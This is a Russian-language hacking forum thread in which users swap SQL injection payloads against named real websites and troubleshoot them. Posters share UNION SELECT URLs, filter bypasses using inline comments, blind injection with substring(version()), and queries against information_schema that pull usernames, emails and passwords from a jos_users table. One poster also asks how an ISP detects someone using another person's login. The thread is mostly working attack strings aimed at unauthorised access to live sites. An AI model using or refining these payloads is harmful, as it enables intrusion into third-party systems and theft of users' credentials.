http://www.theglobalreport.org/print.php?news_id=-100'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+
Ок спасибо http://www.skai.gr/master_story.php?id=113998%27 Тут возможна иньекция? Когда подставляю id=-1+union+select+1,2-- То пишет не найдено
ветка 4 http://www.skai.gr/master_story.php?id=113998+and+substring(version(),1,1)=4 Фильтрация union, select http://www.skai.gr/master_story.php?id=113998+and+substring(version(),1,1)=4/*select*/ PS. diznt давай уже что-то читать начни, а не только писать, всё это в статьях изложено и трудностей вызывать не должно, ты ведь не первый день на форуме
Вот еще такой вопрос (правда не по уязвимостям) Если я к примеру сижу через чужой логин в инете то как меня вычеслят? ну я имею ввиду что корбина узнает что мол кто то сидит с акка и как они меня будут искать? я понимаю что там у них мой адрес где я проживаю но все таки интересует как они узнают что с этого адреса где я прожимаю сидели под чужим логином?
я хоть и не великий и могучий Jokester но выскажу свое пмсм - не факт что там sql injection или вообше есть какая то уязвимость,никакие логические конструкции не проходят, значит по всей видимости в $_GET['a'] заноситься значения только если $_GET['a'] int (например $_GET['a']=is_numeric($_GET['a']) ? $_GET['a'] :1; ну или что типа такого) , а то что неустановлены индексы у массивов так вполне возможно что mysql_fetch_assoc и потом в скрипте идет обрашения к индексам без проверки их существования. Короче похоже на какую то логическую ошибку в скрипте.
Если на сайте есть SQL-inj но не выводится ошибка...то как-то можно обойти? А точнее если вызываю нарушение запроса таким способом 1' то выходит ошибка (похоже SQL класс подключен) ошибка ссылается на WHERE id='1'' PHP: ( 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1 ) А если прописываю так 1'+or+'2 то запрос нормально выполняется... Как можно попробовать провести инъекцию?
ну наверно стоит закрывать остальной запрос коментами, самым простым способом 1'+order+by+1--+(/*,%23), а вообще линк в студию, ну а вообще я не вижу в чем проблема, наверно все таки стоит начать читать статьи.
теперь от меня глупый вопрос, что здесь можно придумать http://ozpp.ru/sovet/lesnyak'/ уж как я не извививался ничего не выходит
если комментарии поставить не удается. в чем я все таки сомневаюсь. можно работать как со слепой инъекцией 1'+and+substring(version(),1,1)=3+or+'2 Итд хотя конечно бред (( конструкция id='1' or '2' - нежизнеспособна.
тут ничего нет. зы постом ниже лайт показал инъект, НО в ФФ3 я его не вижу (х_х) в остальных браузерах ошибки итд. а в фф просто "страница не найдена." поговорить об этом можно тут https://forum.antichat.ru/thread111019.html
У меня в городе есть хороший кинотеат - кронверксинема и я давно на их сайте нашел скулю) Но все никак не могу раскрутить до конца... Решил тут вот запостить. http://kronverkcinema.ru/repertoire/movies/watchmen'/**/union/**/select/**/1,2,3,4,5,6,7/* - это то до чего я добрался. Ошибка осталась, но при другом кол-ве полей еще одна ошибка вылезает => запрос правильный. Но выводимых полей нету... Чего я только не пробывал)
http://www.rfbd.ru/ В общем из information_schema.tables вытягиваю нахожу таблицу jos_users. Далее делаю запрос WHERE+TABLE_NAME=0x6a6f735f7573657273 вот код: http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,column_name,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.colu mns+where+table_name=0x6a6f735f7573657273+limit+4,1®ion=72&rubrika=10 Оттуда с помощью LIMIT нахожу username, email, password. Далее: http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,username,10,11,12,13,14,15,16,17,18,19,20+from+jos_users+limit+1,1®ion=72&rubrika=10 И появляется ошибка. Что не так сделал?
Проверил... Там только две ДБ: a1rfbd_ric_datebase и test... Ни в одной jos_users не подходит. А вообще разве это Joomla? Да и папка /administration/ нету. Ищи другие таблицы...